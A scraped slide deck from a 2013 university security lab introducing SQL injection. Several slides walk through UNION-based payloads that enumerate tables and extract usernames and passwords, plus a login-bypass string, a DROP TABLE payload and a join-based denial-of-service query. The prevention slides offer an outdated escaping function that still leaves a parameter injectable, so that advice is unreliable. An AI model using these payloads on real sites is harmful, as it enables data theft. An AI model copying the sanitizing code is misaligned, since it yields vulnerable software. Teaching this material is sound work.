YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptxYOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptx
YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptx
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
 
YOUVE_GOT_EMAIL_PRELIMS_EL_DORADO_2024.pptx
YOUVE_GOT_EMAIL_PRELIMS_EL_DORADO_2024.pptxYOUVE_GOT_EMAIL_PRELIMS_EL_DORADO_2024.pptx
YOUVE_GOT_EMAIL_PRELIMS_EL_DORADO_2024.pptx
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdf
 

A Brief Introduction in SQL Injection

  • 1. Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
  • 2. • Introduction • Why SQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
  • 3. We are all familiar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
  • 4.
  • 5.  SQL Injection may happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
  • 6.  Simple example:  Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
  • 7.  www.yourtarget.com/list?id=5  if you want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
  • 8.  The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name:  "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name:  "INFORMATION_SCHEMA.COLUMNS.“
  • 9.  Finding the URL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number  Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued 
  • 10.  Now its time to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'--  The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
  • 11.  And Finally its time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts—  And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;) 
  • 12.  Now we can Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
  • 13. If user_list contains 1000 records then, the database is fired up  SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
  • 14. Insert newuser into tbl_user The maliciouse code can be : DROP table tbl_user
  • 15.  How it works Select * from tbl_users Where id=“Fname” and pass=“pass”  Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
  • 16.  Security is the developer’s job  No database, connector, or framework can prevent SQL injection all the time
  • 17. • Implement proper Error Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
  • 18. <?php function sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
  • 19. Vipin Samar, Oracle vice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
  • 20.  Using Stroprocedures: CREATE PROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
  • 21.  I don’t have to worry anymore  Escaping is the fixthe fix  More escaping is better  I can code an escaping function  Only user input is unsafe  Stored procs are the fixthe fix  SQL privileges are the fixthe fix  My app doesn’t need security  Frameworks are the fixthe fix  Parameters quote for you  Parameters are the fixthe fix  Parameters make queries slow  SQL proxies are the fixthe fix  NoSQL databases are the fixthe fix
  • 22. NoSQL databases are immune to SQL injection.

Editor's Notes

  1. Tables have relation with each other . Inserting the row in tables with unauthorized access